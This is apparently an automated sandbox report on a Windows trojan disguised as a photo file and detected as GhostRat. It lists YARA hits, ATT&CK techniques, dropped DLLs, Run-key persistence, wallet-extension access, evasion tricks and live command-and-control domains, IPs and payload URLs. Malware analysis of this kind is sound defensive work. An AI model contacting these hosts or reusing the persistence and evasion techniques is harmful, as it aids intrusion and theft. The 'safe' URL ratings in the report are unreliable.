                      Source: Yara matchFile source: 00000004.00000003.3859358461.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8VhJ2Jq.exe PID: 1492, type: MEMORYSTR
                      Tries to access browser extension known for cryptocurrency wallets
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected GhostRat
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3cc1004.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3eb0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.3c01053.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.13b6033.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3d605bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3eb0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3d605bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.13faa9b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.13faa9b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.50b5a53.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.50b5a53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.50b5a53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.3c01053.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.8VhJ2Jq.exe.13b6033.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.8VhJ2Jq.exe.3cc1004.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.3859300120.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3697654357.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3913735905.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3913881702.0000000003EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3359487322.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3697596813.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3532200835.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3532247912.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3415028370.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3913806067.0000000003D60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3415028370.0000000005071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3914343860.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3378742070.0000000003C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3859358461.00000000050B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8VhJ2Jq.exe PID: 1492, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0045FD80 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,SnmpUtilOidCpy,SnmpUtilOidCpy,SnmpUtilOidCpy,SnmpUtilOidCpy,SnmpUtilOidNCmp,SnmpUtilOidNCmp,SnmpUtilOidNCmp,__snwprintf,FreeLibrary,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,0_2_0045FD80

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media                      		2
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		1
                      Credential API Hooking                      		12
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Access Token Manipulation                      		1
                      Deobfuscate/Decode Files or Information                      		131
                      Input Capture                      		11
                      Peripheral Device Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		1
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)222
                      Process Injection                      		2
                      Obfuscated Files or Information                      		Security Account Manager1
                      Account Discovery                      		SMB/Windows Admin Shares1
                      Screen Capture                      		3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		NTDS4
                      File and Directory Discovery                      		Distributed Component Object Model1
                      Credential API Hooking                      		3
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Masquerading                      		LSA Secrets217
                      System Information Discovery                      		SSH131
                      Input Capture                      		Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Modify Registry                      		Cached Domain Credentials561
                      Security Software Discovery                      		VNC3
                      Clipboard Data                      		Multiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items24
                      Virtualization/Sandbox Evasion                      		DCSync24
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation                      		Proc Filesystem3
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                      Process Injection                      		/etc/passwd and /etc/shadow11
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Indicator Removal                      		Network Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1514420 Sample: photo_2024-09-18_20-00-20.exe Startdate: 20/09/2024 Architecture: WINDOWS Score: 100 30 ad59t82g.com 2->30 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for dropped file 2->44 46 Yara detected GhostRat 2->46 48 8 other signatures 2->48 7 photo_2024-09-18_20-00-20.exe 1 22 2->7         started        12 8VhJ2Jq.exe 2->12         started        14 8VhJ2Jq.exe 2->14         started        signatures3 process4 dnsIp5 32 ad59t82g.com 104.21.22.88, 49723, 49724, 80 CLOUDFLARENETUS United States 7->32 20 C:\Program Files (x86)jXjKxze\libcef.dll, PE32 7->20 dropped 22 C:\Program Files (x86)\...\VCRUNTIME140.dll, PE32 7->22 dropped 24 C:\Program Files (x86)\...\MSVCP140.dll, PE32 7->24 dropped 26 2 other malicious files 7->26 dropped 50 Found API chain indicative of debugger detection 7->50 16 8VhJ2Jq.exe 3 7->16         started        52 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 12->52 54 Hides threads from debuggers 12->54 file6 signatures7 process8 dnsIp9 28 202.79.173.4, 49725, 49726, 49727 BCPL-SGBGPNETGlobalASNSG Singapore 16->28 34 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 16->34 36 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->36 38 Tries to access browser extension known for cryptocurrency wallets 16->38 40 Hides threads from debuggers 16->40 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      photo_2024-09-18_20-00-20.exe8%ReversingLabs

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Program Files (x86)\EjXjKxze\t4d.tmp100%AviraDR/FakePic.Gen
                      C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe0%ReversingLabs
                      C:\Program Files (x86)\EjXjKxze\MSVCP140.dll0%ReversingLabs
                      C:\Program Files (x86)\EjXjKxze\VCRUNTIME140.dll0%ReversingLabs
                      C:\Program Files (x86)\EjXjKxze\libcef.dll8%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://chc-bd.duoyi.comBigServerUrl1.0.20%Avira URL Cloudsafe
                      https://chc-bd.duoyi.com0%Avira URL Cloudsafe
                      https://id.duoyi.com/html/service-agreement.html0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/d.bmp~0%Avira URL Cloudsafe
                      https://www.geonames.org/Timezone0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/t2.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:0%Avira URL Cloudsafe
                      https://id.duoyi.com/html/xieyi.html0%Avira URL Cloudsafe
                      https://id.duoyi.com/html/privacy.html0%Avira URL Cloudsafe
                      http://www.astro.com/swisseph.0%Avira URL Cloudsafe
                      https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired0%Avira URL Cloudsafe
                      https://data.iana.org/time-zones/tz-link.htmlPostScript0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/lon2.bmpHh0%Avira URL Cloudsafe
                      http://zmconfig.duoyi.com/dyminiinstall.txt0%Avira URL Cloudsafe
                      https://zmconfig.duoyi.com/test/dyinstall_public_test.txt0%Avira URL Cloudsafe
                      http://zmconfig.duoyi.com/dyminiinstall.txt_UPDATE_MODULE_HELPER_WINDOW_DUOYI%d0%Avira URL Cloudsafe
                      https://curl.haxx.se/docs/http-cookies.html0%Avira URL Cloudsafe
                      https://zmconfig.duoyi.com/test/dyinstall_public.txt0%Avira URL Cloudsafe
                      https://zmconfig.duoyi.com/test/dyinstall_public_test.txthttps://zmconfig.duoyi.com/test/dyinstall_p0%Avira URL Cloudsafe
                      https://zmconfig.duoyi.com/dyminiinstall.txt0%Avira URL Cloudsafe
                      http://www.openssl.org/support/faq.html0%Avira URL Cloudsafe
                      http://zmlog.duoyi.com:8080/api/zm/data/rece_download_data0%Avira URL Cloudsafe
                      https://zmweb.duoyi.com/zm/protocol/list0%Avira URL Cloudsafe
                      http://www.astrolog.org/astrolog.htm0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/lon2.bmp0%Avira URL Cloudsafe
                      https://support.ubi.com/0%Avira URL Cloudsafe
                      http://www.openssl.org/support/faq.html....................0%Avira URL Cloudsafe
                      https://id.duoyi.com/html/service-agreement.htmlopenhttps://id.duoyi.com/html/xieyi.htmlhttps://id.d0%Avira URL Cloudsafe
                      http://ad59t82g.com/0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/d.bmpf0%Avira URL Cloudsafe
                      http://www.gnu.org0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/lon2.bmp7W0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/text.bmpC:0%Avira URL Cloudsafe
                      http://ad59t82g.com/60%Avira URL Cloudsafe
                      https://www.geonames.org/0%Avira URL Cloudsafe
                      http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t2.bmp0%Avira URL Cloudsafe
                      http://www.astrolog.org/astrolog.htmMain0%Avira URL Cloudsafe
                      https://data.iana.org/time-zones/tz-link.html0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ad59t82g.com
                      		104.21.22.88
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://ad59t82g.com/1/lon2.bmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://chc-bd.duoyi.comBigServerUrl1.0.2photo_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://id.duoyi.com/html/service-agreement.htmlphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.geonames.org/Timezonephoto_2024-09-18_20-00-20.exe, 00000000.00000003.3256424262.00000000038B5000.00000004.00000020.00020000.00000000.sdmp, photo_2024-09-18_20-00-20.exe, 00000000.00000003.3141274556.0000000010030000.00000004.00000020.00020000.00000000.sdmp, 8VhJ2Jq.exe, 00000004.00000002.3914567372.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://id.duoyi.com/html/privacy.htmlphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ad59t82g.com/1/d.bmp~photo_2024-09-18_20-00-20.exe, 00000000.00000003.3099113503.0000000000849000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://id.duoyi.com/html/xieyi.htmlphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://chc-bd.duoyi.comphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.astro.com/swisseph.libcef.dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired8VhJ2Jq.exe, 00000004.00000002.3912030469.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3391720593.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3470560132.00000000007F3000.00000002.00000001.01000000.00000005.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ad59t82g.com/1/t2.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:photo_2024-09-18_20-00-20.exe, 00000000.00000002.3289071499.0000000003599000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://zmconfig.duoyi.com/dyminiinstall.txtphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://data.iana.org/time-zones/tz-link.htmlPostScriptphoto_2024-09-18_20-00-20.exe, 00000000.00000003.3256424262.00000000038B5000.00000004.00000020.00020000.00000000.sdmp, photo_2024-09-18_20-00-20.exe, 00000000.00000003.3141274556.0000000010030000.00000004.00000020.00020000.00000000.sdmp, 8VhJ2Jq.exe, 00000004.00000002.3914567372.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ad59t82g.com/1/lon2.bmpHhphoto_2024-09-18_20-00-20.exe, 00000000.00000002.3288456452.000000000080D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://zmconfig.duoyi.com/dyminiinstall.txt_UPDATE_MODULE_HELPER_WINDOW_DUOYI%dphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://zmconfig.duoyi.com/test/dyinstall_public.txtphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://zmconfig.duoyi.com/test/dyinstall_public_test.txtphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://curl.haxx.se/docs/http-cookies.htmlphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://zmconfig.duoyi.com/dyminiinstall.txtphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.openssl.org/support/faq.htmlphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://zmconfig.duoyi.com/test/dyinstall_public_test.txthttps://zmconfig.duoyi.com/test/dyinstall_pphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://zmlog.duoyi.com:8080/api/zm/data/rece_download_dataphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.ubi.com/8VhJ2Jq.exe, 00000004.00000002.3912030469.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3391720593.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3470560132.00000000007F3000.00000002.00000001.01000000.00000005.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://zmweb.duoyi.com/zm/protocol/listphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.astrolog.org/astrolog.htm8VhJ2Jq.exe, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.openssl.org/support/faq.html....................photo_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://id.duoyi.com/html/service-agreement.htmlopenhttps://id.duoyi.com/html/xieyi.htmlhttps://id.dphoto_2024-09-18_20-00-20.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.gnu.orglibcef.dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ad59t82g.com/1/d.bmpfphoto_2024-09-18_20-00-20.exe, 00000000.00000003.3099113503.0000000000849000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ad59t82g.com/photo_2024-09-18_20-00-20.exe, 00000000.00000003.3074745057.0000000000849000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ad59t82g.com/1/lon2.bmp7Wphoto_2024-09-18_20-00-20.exe, 00000000.00000002.3288456452.000000000080D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ad59t82g.com/6photo_2024-09-18_20-00-20.exe, 00000000.00000003.3099113503.0000000000849000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ad59t82g.com/1/text.bmpC:photo_2024-09-18_20-00-20.exe, 00000000.00000002.3289071499.0000000003599000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.geonames.org/8VhJ2Jq.exe, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t2.bmpphoto_2024-09-18_20-00-20.exe, 00000000.00000002.3289071499.0000000003599000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.astrolog.org/astrolog.htmMainphoto_2024-09-18_20-00-20.exe, 00000000.00000003.3256424262.00000000038B5000.00000004.00000020.00020000.00000000.sdmp, photo_2024-09-18_20-00-20.exe, 00000000.00000003.3141274556.0000000010030000.00000004.00000020.00020000.00000000.sdmp, 8VhJ2Jq.exe, 00000004.00000002.3914567372.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://data.iana.org/time-zones/tz-link.html8VhJ2Jq.exe, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        104.21.22.88
                        		ad59t82g.comUnited States
                        		13335CLOUDFLARENETUSfalse
                        202.79.173.4
                        		unknownSingapore
                        		64050BCPL-SGBGPNETGlobalASNSGtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1514420
                        Start date and time:2024-09-20 11:57:37 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:7
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:photo_2024-09-18_20-00-20.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.evad.winEXE@5/8@1/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 30
                        • Number of non-executed functions: 306
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtEnumerateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: photo_2024-09-18_20-00-20.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        06:01:11API Interceptor429x Sleep call for process: 8VhJ2Jq.exe modified
                        12:00:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe
                        12:00:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        ad59t82g.comN6xnw0iEGs.exeGet hashmaliciousGhostRatBrowse
                        • 172.67.203.195

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSPurchase order Arizona Group 19092024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.97.3
                        EACA1218AC7D98866DFE1F45785598942394234D.htmlGet hashmaliciousUnknownBrowse
                        • 104.18.11.244
                        UPDATED FLOOR PLAN_3D.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.97.3
                        https://l1w5na.verfalaidef.com/MpbF/#Mfrancis.bonnell@rsli.comGet hashmaliciousHTMLPhisherBrowse
                        • 104.17.25.14
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 104.21.75.242
                        Bonus_Payments_Health_Insurance_Vacation_Policy_Update_20243568Acer Liquid Z63568.pdfGet hashmaliciousUnknownBrowse
                        • 104.18.69.40
                        https://www.thegivingspirit.org/Get hashmaliciousUnknownBrowse
                        • 104.16.79.73
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 188.114.96.3
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                        • 188.114.96.3
                        updater.exeGet hashmaliciousRHADAMANTHYSBrowse
                        • 188.114.96.3
                        BCPL-SGBGPNETGlobalASNSGhttp://www.baovietvnapp.top/Get hashmaliciousUnknownBrowse
                        • 202.162.99.84
                        566Md59nGj.exeGet hashmaliciousGhostRat, NitolBrowse
                        • 143.92.58.218
                        http://allegroscn.shop/Get hashmaliciousUnknownBrowse
                        • 118.107.46.141
                        https://ggcqpnfsnnxrwi.top/Get hashmaliciousUnknownBrowse
                        • 118.107.57.111
                        https://ntwbwngshxvvxf.top/Get hashmaliciousUnknownBrowse
                        • 118.107.57.111
                        https://kbvbezivzpsugp.top/Get hashmaliciousUnknownBrowse
                        • 118.107.57.111
                        https://tyfjlkmihzbsoj.top/Get hashmaliciousUnknownBrowse
                        • 118.107.57.111
                        https://wfdxhekrvwtkbe.top/Get hashmaliciousUnknownBrowse
                        • 118.107.57.111
                        http://sevice.asiaGet hashmaliciousUnknownBrowse
                        • 118.107.47.106
                        SecuriteInfo.com.Script.SNH-gen.5224.29912.exeGet hashmaliciousFormBookBrowse
                        • 216.83.36.195

                        JA3 Fingerprints

                        No context

                        Dropped Files

